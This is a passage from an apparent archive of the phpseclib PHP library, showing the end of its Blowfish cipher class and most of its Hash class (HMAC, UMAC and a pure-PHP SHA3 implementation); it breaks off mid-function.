>> 8]) + $sbox3[$x0 & 0xFF]) ^ $p[11]; $x0 ^= self::safe_intval((self::safe_intval($sbox0[(($x1 & -16777216) >> 24) & 0xFF] + $sbox1[($x1 & 0xFF0000) >> 16]) ^ $sbox2[($x1 & 0xFF00) >> 8]) + $sbox3[$x1 & 0xFF]) ^ $p[12]; $x1 ^= self::safe_intval((self::safe_intval($sbox0[(($x0 & -16777216) >> 24) & 0xFF] + $sbox1[($x0 & 0xFF0000) >> 16]) ^ $sbox2[($x0 & 0xFF00) >> 8]) + $sbox3[$x0 & 0xFF]) ^ $p[13]; $x0 ^= self::safe_intval((self::safe_intval($sbox0[(($x1 & -16777216) >> 24) & 0xFF] + $sbox1[($x1 & 0xFF0000) >> 16]) ^ $sbox2[($x1 & 0xFF00) >> 8]) + $sbox3[$x1 & 0xFF]) ^ $p[14]; $x1 ^= self::safe_intval((self::safe_intval($sbox0[(($x0 & -16777216) >> 24) & 0xFF] + $sbox1[($x0 & 0xFF0000) >> 16]) ^ $sbox2[($x0 & 0xFF00) >> 8]) + $sbox3[$x0 & 0xFF]) ^ $p[15]; $x0 ^= self::safe_intval((self::safe_intval($sbox0[(($x1 & -16777216) >> 24) & 0xFF] + $sbox1[($x1 & 0xFF0000) >> 16]) ^ $sbox2[($x1 & 0xFF00) >> 8]) + $sbox3[$x1 & 0xFF]) ^ $p[16]; return [$x1 ^ $p[17], $x0]; } /** * Decrypts a block * * @param string $in * @return string */ protected function decryptBlock($in) { $p = $this->bctx['p']; $sb_0 = $this->bctx['sb'][0]; $sb_1 = $this->bctx['sb'][1]; $sb_2 = $this->bctx['sb'][2]; $sb_3 = $this->bctx['sb'][3]; $in = unpack('N*', $in); $l = $in[1]; $r = $in[2]; for ($i = 17; $i > 2; $i -= 2) { $l ^= $p[$i]; $r ^= self::safe_intval((self::safe_intval($sb_0[$l >> 24 & 0xff] + $sb_1[$l >> 16 & 0xff]) ^ $sb_2[$l >> 8 & 0xff]) + $sb_3[$l & 0xff]); $r ^= $p[$i - 1]; $l ^= self::safe_intval((self::safe_intval($sb_0[$r >> 24 & 0xff] + $sb_1[$r >> 16 & 0xff]) ^ $sb_2[$r >> 8 & 0xff]) + $sb_3[$r & 0xff]); } return pack('N*', $r ^ $p[0], $l ^ $p[1]); } /** * Setup the performance-optimized function for de/encrypt() * * @see \phpseclib3\Crypt\Common\SymmetricKey::_setupInlineCrypt() */ protected function setupInlineCrypt() { $p = $this->bctx['p']; $init_crypt = ' static $sb_0, $sb_1, $sb_2, $sb_3; if (!$sb_0) { $sb_0 = $this->bctx["sb"][0]; $sb_1 = $this->bctx["sb"][1]; $sb_2 = $this->bctx["sb"][2]; $sb_3 = $this->bctx["sb"][3]; } '; $safeint = self::safe_intval_inline(); // Generating encrypt code: $encrypt_block = ' $in = unpack("N*", $in); $l = $in[1]; $r = $in[2]; '; for ($i = 0; $i < 16; $i += 2) { $encrypt_block .= ' $l^= ' . $p[$i] . '; $r^= ' . sprintf($safeint, '(' . sprintf($safeint, '$sb_0[$l >> 24 & 0xff] + $sb_1[$l >> 16 & 0xff]') . ' ^ $sb_2[$l >> 8 & 0xff]) + $sb_3[$l & 0xff]') . '; $r^= ' . $p[$i + 1] . '; $l^= ' . sprintf($safeint, '(' . sprintf($safeint, '$sb_0[$r >> 24 & 0xff] + $sb_1[$r >> 16 & 0xff]') . ' ^ $sb_2[$r >> 8 & 0xff]) + $sb_3[$r & 0xff]') . '; '; } $encrypt_block .= ' $in = pack("N*", $r ^ ' . $p[17] . ', $l ^ ' . $p[16] . ' ); '; // Generating decrypt code: $decrypt_block = ' $in = unpack("N*", $in); $l = $in[1]; $r = $in[2]; '; for ($i = 17; $i > 2; $i -= 2) { $decrypt_block .= ' $l^= ' . $p[$i] . '; $r^= ' . sprintf($safeint, '(' . sprintf($safeint, '$sb_0[$l >> 24 & 0xff] + $sb_1[$l >> 16 & 0xff]') . ' ^ $sb_2[$l >> 8 & 0xff]) + $sb_3[$l & 0xff]') . '; $r^= ' . $p[$i - 1] . '; $l^= ' . sprintf($safeint, '(' . sprintf($safeint, '$sb_0[$r >> 24 & 0xff] + $sb_1[$r >> 16 & 0xff]') . ' ^ $sb_2[$r >> 8 & 0xff]) + $sb_3[$r & 0xff]') . '; '; } $decrypt_block .= ' $in = pack("N*", $r ^ ' . $p[0] . ', $l ^ ' . $p[1] . ' ); '; $this->inline_crypt = $this->createInlineCryptFunction( [ 'init_crypt' => $init_crypt, 'init_encrypt' => '', 'init_decrypt' => '', 'encrypt_block' => $encrypt_block, 'decrypt_block' => $decrypt_block ] ); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/Hash.php000064400000133140147600400120020450 0ustar00 * setKey('abcdefg'); * * echo base64_encode($hash->hash('abcdefg')); * ?> * * * @author Jim Wigginton * @copyright 2015 Jim Wigginton * @author Andreas Fischer * @copyright 2015 Andreas Fischer * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt; use phpseclib3\Common\Functions\Strings; use phpseclib3\Exception\InsufficientSetupException; use phpseclib3\Exception\UnsupportedAlgorithmException; use phpseclib3\Math\BigInteger; use phpseclib3\Math\PrimeField; /** * @author Jim Wigginton * @author Andreas Fischer */ class Hash { /** * Padding Types * */ const PADDING_KECCAK = 1; /** * Padding Types * */ const PADDING_SHA3 = 2; /** * Padding Types * */ const PADDING_SHAKE = 3; /** * Padding Type * * Only used by SHA3 * * @var int */ private $paddingType = 0; /** * Hash Parameter * * @see self::setHash() * @var int */ private $hashParam; /** * Byte-length of hash output (Internal HMAC) * * @see self::setHash() * @var int */ private $length; /** * Hash Algorithm * * @see self::setHash() * @var string */ private $algo; /** * Key * * @see self::setKey() * @var string */ private $key = false; /** * Nonce * * @see self::setNonce() * @var string */ private $nonce = false; /** * Hash Parameters * * @var array */ private $parameters = []; /** * Computed Key * * @see self::_computeKey() * @var string */ private $computedKey = false; /** * Outer XOR (Internal HMAC) * * Used only for sha512/* * * @see self::hash() * @var string */ private $opad; /** * Inner XOR (Internal HMAC) * * Used only for sha512/* * * @see self::hash() * @var string */ private $ipad; /** * Recompute AES Key * * Used only for umac * * @see self::hash() * @var boolean */ private $recomputeAESKey; /** * umac cipher object * * @see self::hash() * @var \phpseclib3\Crypt\AES */ private $c; /** * umac pad * * @see self::hash() * @var string */ private $pad; /** * Block Size * * @var int */ private $blockSize; /**#@+ * UMAC variables * * @var PrimeField */ private static $factory36; private static $factory64; private static $factory128; private static $offset64; private static $offset128; private static $marker64; private static $marker128; private static $maxwordrange64; private static $maxwordrange128; /**#@-*/ /** * Default Constructor. * * @param string $hash */ public function __construct($hash = 'sha256') { $this->setHash($hash); } /** * Sets the key for HMACs * * Keys can be of any length. * * @param string $key */ public function setKey($key = false) { $this->key = $key; $this->computeKey(); $this->recomputeAESKey = true; } /** * Sets the nonce for UMACs * * Keys can be of any length. * * @param string $nonce */ public function setNonce($nonce = false) { switch (true) { case !is_string($nonce): case strlen($nonce) > 0 && strlen($nonce) <= 16: $this->recomputeAESKey = true; $this->nonce = $nonce; return; } throw new \LengthException('The nonce length must be between 1 and 16 bytes, inclusive'); } /** * Pre-compute the key used by the HMAC * * Quoting http://tools.ietf.org/html/rfc2104#section-2, "Applications that use keys longer than B bytes * will first hash the key using H and then use the resultant L byte string as the actual key to HMAC." * * As documented in https://www.reddit.com/r/PHP/comments/9nct2l/symfonypolyfill_hash_pbkdf2_correct_fix_for/ * when doing an HMAC multiple times it's faster to compute the hash once instead of computing it during * every call * */ private function computeKey() { if ($this->key === false) { $this->computedKey = false; return; } if (strlen($this->key) <= $this->getBlockLengthInBytes()) { $this->computedKey = $this->key; return; } $this->computedKey = is_array($this->algo) ? call_user_func($this->algo, $this->key) : hash($this->algo, $this->key, true); } /** * Gets the hash function. * * As set by the constructor or by the setHash() method. * * @return string */ public function getHash() { return $this->hashParam; } /** * Sets the hash function. * * @param string $hash */ public function setHash($hash) { $this->hashParam = $hash = strtolower($hash); switch ($hash) { case 'umac-32': case 'umac-64': case 'umac-96': case 'umac-128': $this->blockSize = 128; $this->length = abs(substr($hash, -3)) >> 3; $this->algo = 'umac'; return; case 'md2-96': case 'md5-96': case 'sha1-96': case 'sha224-96': case 'sha256-96': case 'sha384-96': case 'sha512-96': case 'sha512/224-96': case 'sha512/256-96': $hash = substr($hash, 0, -3); $this->length = 12; // 96 / 8 = 12 break; case 'md2': case 'md5': $this->length = 16; break; case 'sha1': $this->length = 20; break; case 'sha224': case 'sha512/224': case 'sha3-224': $this->length = 28; break; case 'keccak256': $this->paddingType = self::PADDING_KECCAK; // fall-through case 'sha256': case 'sha512/256': case 'sha3-256': $this->length = 32; break; case 'sha384': case 'sha3-384': $this->length = 48; break; case 'sha512': case 'sha3-512': $this->length = 64; break; default: if (preg_match('#^(shake(?:128|256))-(\d+)$#', $hash, $matches)) { $this->paddingType = self::PADDING_SHAKE; $hash = $matches[1]; $this->length = $matches[2] >> 3; } else { throw new UnsupportedAlgorithmException( "$hash is not a supported algorithm" ); } } switch ($hash) { case 'md2': case 'md2-96': $this->blockSize = 128; break; case 'md5-96': case 'sha1-96': case 'sha224-96': case 'sha256-96': case 'md5': case 'sha1': case 'sha224': case 'sha256': $this->blockSize = 512; break; case 'sha3-224': $this->blockSize = 1152; // 1600 - 2*224 break; case 'sha3-256': case 'shake256': case 'keccak256': $this->blockSize = 1088; // 1600 - 2*256 break; case 'sha3-384': $this->blockSize = 832; // 1600 - 2*384 break; case 'sha3-512': $this->blockSize = 576; // 1600 - 2*512 break; case 'shake128': $this->blockSize = 1344; // 1600 - 2*128 break; default: $this->blockSize = 1024; } if (in_array(substr($hash, 0, 5), ['sha3-', 'shake', 'kecca'])) { // PHP 7.1.0 introduced support for "SHA3 fixed mode algorithms": // http://php.net/ChangeLog-7.php#7.1.0 if (version_compare(PHP_VERSION, '7.1.0') < 0 || substr($hash, 0, 5) != 'sha3-') { //preg_match('#(\d+)$#', $hash, $matches); //$this->parameters['capacity'] = 2 * $matches[1]; // 1600 - $this->blockSize //$this->parameters['rate'] = 1600 - $this->parameters['capacity']; // == $this->blockSize if (!$this->paddingType) { $this->paddingType = self::PADDING_SHA3; } $this->parameters = [ 'capacity' => 1600 - $this->blockSize, 'rate' => $this->blockSize, 'length' => $this->length, 'padding' => $this->paddingType ]; $hash = ['phpseclib3\Crypt\Hash', PHP_INT_SIZE == 8 ? 'sha3_64' : 'sha3_32']; } } if ($hash == 'sha512/224' || $hash == 'sha512/256') { // PHP 7.1.0 introduced sha512/224 and sha512/256 support: // http://php.net/ChangeLog-7.php#7.1.0 if (version_compare(PHP_VERSION, '7.1.0') < 0) { // from http://csrc.nist.gov/publications/fips/fips180-4/fips-180-4.pdf#page=24 $initial = $hash == 'sha512/256' ? [ '22312194FC2BF72C', '9F555FA3C84C64C2', '2393B86B6F53B151', '963877195940EABD', '96283EE2A88EFFE3', 'BE5E1E2553863992', '2B0199FC2C85B8AA', '0EB72DDC81C52CA2' ] : [ '8C3D37C819544DA2', '73E1996689DCD4D6', '1DFAB7AE32FF9C82', '679DD514582F9FCF', '0F6D2B697BD44DA8', '77E36F7304C48942', '3F9D85A86A1D36C8', '1112E6AD91D692A1' ]; for ($i = 0; $i < 8; $i++) { $initial[$i] = new BigInteger($initial[$i], 16); $initial[$i]->setPrecision(64); } $this->parameters = compact('initial'); $hash = ['phpseclib3\Crypt\Hash', 'sha512']; } } if (is_array($hash)) { $b = $this->blockSize >> 3; $this->ipad = str_repeat(chr(0x36), $b); $this->opad = str_repeat(chr(0x5C), $b); } $this->algo = $hash; $this->computeKey(); } /** * KDF: Key-Derivation Function * * The key-derivation function generates pseudorandom bits used to key the hash functions. * * @param int $index a non-negative integer less than 2^64 * @param int $numbytes a non-negative integer less than 2^64 * @return string string of length numbytes bytes */ private function kdf($index, $numbytes) { $this->c->setIV(pack('N4', 0, $index, 0, 1)); return $this->c->encrypt(str_repeat("\0", $numbytes)); } /** * PDF Algorithm * * @return string string of length taglen bytes. */ private function pdf() { $k = $this->key; $nonce = $this->nonce; $taglen = $this->length; // // Extract and zero low bit(s) of Nonce if needed // if ($taglen <= 8) { $last = strlen($nonce) - 1; $mask = $taglen == 4 ? "\3" : "\1"; $index = $nonce[$last] & $mask; $nonce[$last] = $nonce[$last] ^ $index; } // // Make Nonce BLOCKLEN bytes by appending zeroes if needed // $nonce = str_pad($nonce, 16, "\0"); // // Generate subkey, encipher and extract indexed substring // $kp = $this->kdf(0, 16); $c = new AES('ctr'); $c->disablePadding(); $c->setKey($kp); $c->setIV($nonce); $t = $c->encrypt("\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"); // we could use ord() but per https://paragonie.com/blog/2016/06/constant-time-encoding-boring-cryptography-rfc-4648-and-you // unpack() doesn't leak timing info return $taglen <= 8 ? substr($t, unpack('C', $index)[1] * $taglen, $taglen) : substr($t, 0, $taglen); } /** * UHASH Algorithm * * @param string $m string of length less than 2^67 bits. * @param int $taglen the integer 4, 8, 12 or 16. * @return string string of length taglen bytes. */ private function uhash($m, $taglen) { // // One internal iteration per 4 bytes of output // $iters = $taglen >> 2; // // Define total key needed for all iterations using KDF. // L1Key reuses most key material between iterations. // //$L1Key = $this->kdf(1, 1024 + ($iters - 1) * 16); $L1Key = $this->kdf(1, (1024 + ($iters - 1)) * 16); $L2Key = $this->kdf(2, $iters * 24); $L3Key1 = $this->kdf(3, $iters * 64); $L3Key2 = $this->kdf(4, $iters * 4); // // For each iteration, extract key and do three-layer hash. // If bytelength(M) <= 1024, then skip L2-HASH. // $y = ''; for ($i = 0; $i < $iters; $i++) { $L1Key_i = substr($L1Key, $i * 16, 1024); $L2Key_i = substr($L2Key, $i * 24, 24); $L3Key1_i = substr($L3Key1, $i * 64, 64); $L3Key2_i = substr($L3Key2, $i * 4, 4); $a = self::L1Hash($L1Key_i, $m); $b = strlen($m) <= 1024 ? "\0\0\0\0\0\0\0\0$a" : self::L2Hash($L2Key_i, $a); $c = self::L3Hash($L3Key1_i, $L3Key2_i, $b); $y .= $c; } return $y; } /** * L1-HASH Algorithm * * The first-layer hash breaks the message into 1024-byte chunks and * hashes each with a function called NH. Concatenating the results * forms a string, which is up to 128 times shorter than the original. * * @param string $k string of length 1024 bytes. * @param string $m string of length less than 2^67 bits. * @return string string of length (8 * ceil(bitlength(M)/8192)) bytes. */ private static function L1Hash($k, $m) { // // Break M into 1024 byte chunks (final chunk may be shorter) // $m = str_split($m, 1024); // // For each chunk, except the last: endian-adjust, NH hash // and add bit-length. Use results to build Y. // $length = new BigInteger(1024 * 8); $y = ''; for ($i = 0; $i < count($m) - 1; $i++) { $m[$i] = pack('N*', ...unpack('V*', $m[$i])); // ENDIAN-SWAP $y .= static::nh($k, $m[$i], $length); } // // For the last chunk: pad to 32-byte boundary, endian-adjust, // NH hash and add bit-length. Concatenate the result to Y. // $length = count($m) ? strlen($m[$i]) : 0; $pad = 32 - ($length % 32); $pad = max(32, $length + $pad % 32); $m[$i] = str_pad(isset($m[$i]) ? $m[$i] : '', $pad, "\0"); // zeropad $m[$i] = pack('N*', ...unpack('V*', $m[$i])); // ENDIAN-SWAP $y .= static::nh($k, $m[$i], new BigInteger($length * 8)); return $y; } /** * NH Algorithm * * @param string $k string of length 1024 bytes. * @param string $m string with length divisible by 32 bytes. * @return string string of length 8 bytes. */ private static function nh($k, $m, $length) { $toUInt32 = function ($x) { $x = new BigInteger($x, 256); $x->setPrecision(32); return $x; }; // // Break M and K into 4-byte chunks // //$t = strlen($m) >> 2; $m = str_split($m, 4); $t = count($m); $k = str_split($k, 4); $k = array_pad(array_slice($k, 0, $t), $t, 0); $m = array_map($toUInt32, $m); $k = array_map($toUInt32, $k); // // Perform NH hash on the chunks, pairing words for multiplication // which are 4 apart to accommodate vector-parallelism. // $y = new BigInteger(); $y->setPrecision(64); $i = 0; while ($i < $t) { $temp = $m[$i]->add($k[$i]); $temp->setPrecision(64); $temp = $temp->multiply($m[$i + 4]->add($k[$i + 4])); $y = $y->add($temp); $temp = $m[$i + 1]->add($k[$i + 1]); $temp->setPrecision(64); $temp = $temp->multiply($m[$i + 5]->add($k[$i + 5])); $y = $y->add($temp); $temp = $m[$i + 2]->add($k[$i + 2]); $temp->setPrecision(64); $temp = $temp->multiply($m[$i + 6]->add($k[$i + 6])); $y = $y->add($temp); $temp = $m[$i + 3]->add($k[$i + 3]); $temp->setPrecision(64); $temp = $temp->multiply($m[$i + 7]->add($k[$i + 7])); $y = $y->add($temp); $i += 8; } return $y->add($length)->toBytes(); } /** * L2-HASH: Second-Layer Hash * * The second-layer rehashes the L1-HASH output using a polynomial hash * called POLY. If the L1-HASH output is long, then POLY is called once * on a prefix of the L1-HASH output and called using different settings * on the remainder. (This two-step hashing of the L1-HASH output is * needed only if the message length is greater than 16 megabytes.) * Careful implementation of POLY is necessary to avoid a possible * timing attack (see Section 6.6 for more information). * * @param string $k string of length 24 bytes. * @param string $m string of length less than 2^64 bytes. * @return string string of length 16 bytes. */ private static function L2Hash($k, $m) { // // Extract keys and restrict to special key-sets // $k64 = $k & "\x01\xFF\xFF\xFF\x01\xFF\xFF\xFF"; $k64 = new BigInteger($k64, 256); $k128 = substr($k, 8) & "\x01\xFF\xFF\xFF\x01\xFF\xFF\xFF\x01\xFF\xFF\xFF\x01\xFF\xFF\xFF"; $k128 = new BigInteger($k128, 256); // // If M is no more than 2^17 bytes, hash under 64-bit prime, // otherwise, hash first 2^17 bytes under 64-bit prime and // remainder under 128-bit prime. // if (strlen($m) <= 0x20000) { // 2^14 64-bit words $y = self::poly(64, self::$maxwordrange64, $k64, $m); } else { $m_1 = substr($m, 0, 0x20000); // 1 << 17 $m_2 = substr($m, 0x20000) . "\x80"; $length = strlen($m_2); $pad = 16 - ($length % 16); $pad %= 16; $m_2 = str_pad($m_2, $length + $pad, "\0"); // zeropad $y = self::poly(64, self::$maxwordrange64, $k64, $m_1); $y = str_pad($y, 16, "\0", STR_PAD_LEFT); $y = self::poly(128, self::$maxwordrange128, $k128, $y . $m_2); } return str_pad($y, 16, "\0", STR_PAD_LEFT); } /** * POLY Algorithm * * @param int $wordbits the integer 64 or 128. * @param BigInteger $maxwordrange positive integer less than 2^wordbits. * @param BigInteger $k integer in the range 0 ... prime(wordbits) - 1. * @param string $m string with length divisible by (wordbits / 8) bytes. * @return integer in the range 0 ... prime(wordbits) - 1. */ private static function poly($wordbits, $maxwordrange, $k, $m) { // // Define constants used for fixing out-of-range words // $wordbytes = $wordbits >> 3; if ($wordbits == 128) { $factory = self::$factory128; $offset = self::$offset128; $marker = self::$marker128; } else { $factory = self::$factory64; $offset = self::$offset64; $marker = self::$marker64; } $k = $factory->newInteger($k); // // Break M into chunks of length wordbytes bytes // $m_i = str_split($m, $wordbytes); // // Each input word m is compared with maxwordrange. If not smaller // then 'marker' and (m - offset), both in range, are hashed. // $y = $factory->newInteger(new BigInteger(1)); foreach ($m_i as $m) { $m = $factory->newInteger(new BigInteger($m, 256)); if ($m->compare($maxwordrange) >= 0) { $y = $k->multiply($y)->add($marker); $y = $k->multiply($y)->add($m->subtract($offset)); } else { $y = $k->multiply($y)->add($m); } } return $y->toBytes(); } /** * L3-HASH: Third-Layer Hash * * The output from L2-HASH is 16 bytes long. This final hash function * hashes the 16-byte string to a fixed length of 4 bytes. * * @param string $k1 string of length 64 bytes. * @param string $k2 string of length 4 bytes. * @param string $m string of length 16 bytes. * @return string string of length 4 bytes. */ private static function L3Hash($k1, $k2, $m) { $factory = self::$factory36; $y = $factory->newInteger(new BigInteger()); for ($i = 0; $i < 8; $i++) { $m_i = $factory->newInteger(new BigInteger(substr($m, 2 * $i, 2), 256)); $k_i = $factory->newInteger(new BigInteger(substr($k1, 8 * $i, 8), 256)); $y = $y->add($m_i->multiply($k_i)); } $y = str_pad(substr($y->toBytes(), -4), 4, "\0", STR_PAD_LEFT); $y = $y ^ $k2; return $y; } /** * Compute the Hash / HMAC / UMAC. * * @param string $text * @return string */ public function hash($text) { $algo = $this->algo; if ($algo == 'umac') { if ($this->recomputeAESKey) { if (!is_string($this->nonce)) { throw new InsufficientSetupException('No nonce has been set'); } if (!is_string($this->key)) { throw new InsufficientSetupException('No key has been set'); } if (strlen($this->key) != 16) { throw new \LengthException('Key must be 16 bytes long'); } if (!isset(self::$maxwordrange64)) { $one = new BigInteger(1); $prime36 = new BigInteger("\x00\x00\x00\x0F\xFF\xFF\xFF\xFB", 256); self::$factory36 = new PrimeField($prime36); $prime64 = new BigInteger("\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xC5", 256); self::$factory64 = new PrimeField($prime64); $prime128 = new BigInteger("\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x61", 256); self::$factory128 = new PrimeField($prime128); self::$offset64 = new BigInteger("\1\0\0\0\0\0\0\0\0", 256); self::$offset64 = self::$factory64->newInteger(self::$offset64->subtract($prime64)); self::$offset128 = new BigInteger("\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 256); self::$offset128 = self::$factory128->newInteger(self::$offset128->subtract($prime128)); self::$marker64 = self::$factory64->newInteger($prime64->subtract($one)); self::$marker128 = self::$factory128->newInteger($prime128->subtract($one)); $maxwordrange64 = $one->bitwise_leftShift(64)->subtract($one->bitwise_leftShift(32)); self::$maxwordrange64 = self::$factory64->newInteger($maxwordrange64); $maxwordrange128 = $one->bitwise_leftShift(128)->subtract($one->bitwise_leftShift(96)); self::$maxwordrange128 = self::$factory128->newInteger($maxwordrange128); } $this->c = new AES('ctr'); $this->c->disablePadding(); $this->c->setKey($this->key); $this->pad = $this->pdf(); $this->recomputeAESKey = false; } $hashedmessage = $this->uhash($text, $this->length); return $hashedmessage ^ $this->pad; } if (is_array($algo)) { if (empty($this->key) || !is_string($this->key)) { return substr($algo($text, ...array_values($this->parameters)), 0, $this->length); } // SHA3 HMACs are discussed at https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.202.pdf#page=30 $key = str_pad($this->computedKey, $b, chr(0)); $temp = $this->ipad ^ $key; $temp .= $text; $temp = substr($algo($temp, ...array_values($this->parameters)), 0, $this->length); $output = $this->opad ^ $key; $output .= $temp; $output = $algo($output, ...array_values($this->parameters)); return substr($output, 0, $this->length); } $output = !empty($this->key) || is_string($this->key) ? hash_hmac($algo, $text, $this->computedKey, true) : hash($algo, $text, true); return strlen($output) > $this->length ? substr($output, 0, $this->length) : $output; } /** * Returns the hash length (in bits) * * @return int */ public function getLength() { return $this->length << 3; } /** * Returns the hash length (in bytes) * * @return int */ public function getLengthInBytes() { return $this->length; } /** * Returns the block length (in bits) * * @return int */ public function getBlockLength() { return $this->blockSize; } /** * Returns the block length (in bytes) * * @return int */ public function getBlockLengthInBytes() { return $this->blockSize >> 3; } /** * Pads SHA3 based on the mode * * @param int $padLength * @param int $padType * @return string */ private static function sha3_pad($padLength, $padType) { switch ($padType) { case self::PADDING_KECCAK: $temp = chr(0x01) . str_repeat("\0", $padLength - 1); $temp[$padLength - 1] = $temp[$padLength - 1] | chr(0x80); return $temp; case self::PADDING_SHAKE: $temp = chr(0x1F) . str_repeat("\0", $padLength - 1); $temp[$padLength - 1] = $temp[$padLength - 1] | chr(0x80); return $temp; //case self::PADDING_SHA3: default: // from https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.202.pdf#page=36 return $padLength == 1 ? chr(0x86) : chr(0x06) . str_repeat("\0", $padLength - 2) . chr(0x80); } } /** * Pure-PHP 32-bit implementation of SHA3 * * Whereas BigInteger.php's 32-bit engine works on PHP 64-bit this 32-bit implementation * of SHA3 will *not* work on PHP 64-bit. This is because this implementation * employees bitwise NOTs and bitwise left shifts. And the round constants only work * on 32-bit PHP. eg. dechex(-2147483648) returns 80000000 on 32-bit PHP and * FFFFFFFF80000000 on 64-bit PHP. Sure, we could do bitwise ANDs but that would slow * things down. * * SHA512 requires BigInteger to simulate 64-bit unsigned integers because SHA2 employees * addition whereas SHA3 just employees bitwise operators. PHP64 only supports signed * 64-bit integers, which complicates addition, whereas that limitation isn't an issue * for SHA3. * * In https://ws680.nist.gov/publication/get_pdf.cfm?pub_id=919061#page=16 KECCAK[C] is * defined as "the KECCAK instance with KECCAK-f[1600] as the underlying permutation and * capacity c". This is relevant because, altho the KECCAK standard defines a mode * (KECCAK-f[800]) designed for 32-bit machines that mode is incompatible with SHA3 * * @param string $p * @param int $c * @param int $r * @param int $d * @param int $padType */ private static function sha3_32($p, $c, $r, $d, $padType) { $block_size = $r >> 3; $padLength = $block_size - (strlen($p) % $block_size); $num_ints = $block_size >> 2; $p .= static::sha3_pad($padLength, $padType); $n = strlen($p) / $r; // number of blocks $s = [ [[0, 0], [0, 0], [0, 0], [0, 0], [0, 0]], [[0, 0], [0, 0], [0, 0], [0, 0], [0, 0]], [[0, 0], [0, 0], [0, 0], [0, 0], [0, 0]], [[0, 0], [0, 0], [0, 0], [0, 0], [0, 0]], [[0, 0], [0, 0], [0, 0], [0, 0], [0, 0]] ]; $p = str_split($p, $block_size); foreach ($p as $pi) { $pi = unpack('V*', $pi); $x = $y = 0; for ($i = 1; $i <= $num_ints; $i += 2) { $s[$x][$y][0] ^= $pi[$i + 1]; $s[$x][$y][1] ^= $pi[$i]; if (++$y == 5) { $y = 0; $x++; } } static::processSHA3Block32($s); } $z = ''; $i = $j = 0; while (strlen($z) < $d) { $z .= pack('V2', $s[$i][$j][1], $s[$i][$j++][0]); if ($j == 5) { $j = 0; $i++; if ($i == 5) { $i = 0; static::processSHA3Block32($s); } } } return $z; } /** * 32-bit block processing method for SHA3 * * @param array $s */ private static function processSHA3Block32(&$s) { static $rotationOffsets = [ [ 0, 1, 62, 28, 27], [36, 44, 6, 55, 20], [ 3, 10, 43, 25, 39], [41, 45, 15, 21, 8], [18, 2, 61, 56, 14] ]; // the standards give these constants in hexadecimal notation. it's tempting to want to use // that same notation, here, however, we can't, because 0x80000000, on PHP32, is a positive // float - not the negative int that we need to be in PHP32. so we use -2147483648 instead static $roundConstants = [ [0, 1], [0, 32898], [-2147483648, 32906], [-2147483648, -2147450880], [0, 32907], [0, -2147483647], [-2147483648, -2147450751], [-2147483648, 32777], [0, 138], [0, 136], [0, -2147450871], [0, -2147483638], [0, -2147450741], [-2147483648, 139], [-2147483648, 32905], [-2147483648, 32771], [-2147483648, 32770], [-2147483648, 128], [0, 32778], [-2147483648, -2147483638], [-2147483648, -2147450751], [-2147483648, 32896], [0, -2147483647], [-2147483648, -2147450872] ]; for ($round = 0; $round < 24; $round++) { // theta step $parity = $rotated = []; for ($i = 0; $i < 5; $i++) { $parity[] = [ $s[0][$i][0] ^ $s[1][$i][0] ^ $s[2][$i][0] ^ $s[3][$i][0] ^ $s[4][$i][0], $s[0][$i][1] ^ $s[1][$i][1] ^ $s[2][$i][1] ^ $s[3][$i][1] ^ $s[4][$i][1] ]; $rotated[] = static::rotateLeft32($parity[$i], 1); } $temp = [ [$parity[4][0] ^ $rotated[1][0], $parity[4][1] ^ $rotated[1][1]], [$parity[0][0] ^ $rotated[2][0], $parity[0][1] ^ $rotated[2][1]], [$parity[1][0] ^ $rotated[3][0], $parity[1][1] ^ $rotated[3][1]], [$parity[2][0] ^ $rotated[4][0], $parity[2][1] ^ $rotated[4][1]], [$parity[3][0] ^ $rotated[0][0], $parity[3][1] ^ $rotated[0][1]] ]; for ($i = 0; $i < 5; $i++) { for ($j = 0; $j < 5; $j++) { $s[$i][$j][0] ^= $temp[$j][0]; $s[$i][$j][1] ^= $temp[$j][1]; } } $st = $s; // rho and pi steps for ($i = 0; $i < 5; $i++) { for ($j = 0; $j < 5; $j++) { $st[(2 * $i + 3 * $j) % 5][$j] = static::rotateLeft32($s[$j][$i], $rotationOffsets[$j][$i]); } } // chi step for ($i = 0; $i < 5; $i++) { $s[$i][0] = [ $st[$i][0][0] ^ (~$st[$i][1][0] & $st[$i][2][0]), $st[$i][0][1] ^ (~$st[$i][1][1] & $st[$i][2][1]) ]; $s[$i][1] = [ $st[$i][1][0] ^ (~$st[$i][2][0] & $st[$i][3][0]), $st[$i][1][1] ^ (~$st[$i][2][1] & $st[$i][3][1]) ]; $s[$i][2] = [ $st[$i][2][0] ^ (~$st[$i][3][0] & $st[$i][4][0]), $st[$i][2][1] ^ (~$st[$i][3][1] & $st[$i][4][1]) ]; $s[$i][3] = [ $st[$i][3][0] ^ (~$st[$i][4][0] & $st[$i][0][0]), $st[$i][3][1] ^ (~$st[$i][4][1] & $st[$i][0][1]) ]; $s[$i][4] = [ $st[$i][4][0] ^ (~$st[$i][0][0] & $st[$i][1][0]), $st[$i][4][1] ^ (~$st[$i][0][1] & $st[$i][1][1]) ]; } // iota step $s[0][0][0] ^= $roundConstants[$round][0]; $s[0][0][1] ^= $roundConstants[$round][1]; } } /** * Rotate 32-bit int * * @param array $x * @param int $shift */ private static function rotateLeft32($x, $shift) { if ($shift < 32) { list($hi, $lo) = $x; } else { $shift -= 32; list($lo, $hi) = $x; } return [ ($hi << $shift) | (($lo >> (32 - $shift)) & (1 << $shift) - 1), ($lo << $shift) | (($hi >> (32 - $shift)) & (1 << $shift) - 1) ]; } /** * Pure-PHP 64-bit implementation of SHA3 * * @param string $p * @param int $c * @param int $r * @param int $d * @param int $padType */ private static function sha3_64($p, $c, $r, $d, $padType) { $block_size = $r >> 3; $padLength = $block_size - (strlen($p) % $block_size); $num_ints = $block_size >> 2; $p .= static::sha3_pad($padLength, $padType); $n = strlen($p) / $r; // number of blocks $s = [ [0, 0, 0, 0, 0], [0, 0, 0, 0, 0], [0, 0, 0, 0, 0], [0, 0, 0, 0, 0], [0, 0, 0, 0, 0] ]; $p = str_split($p, 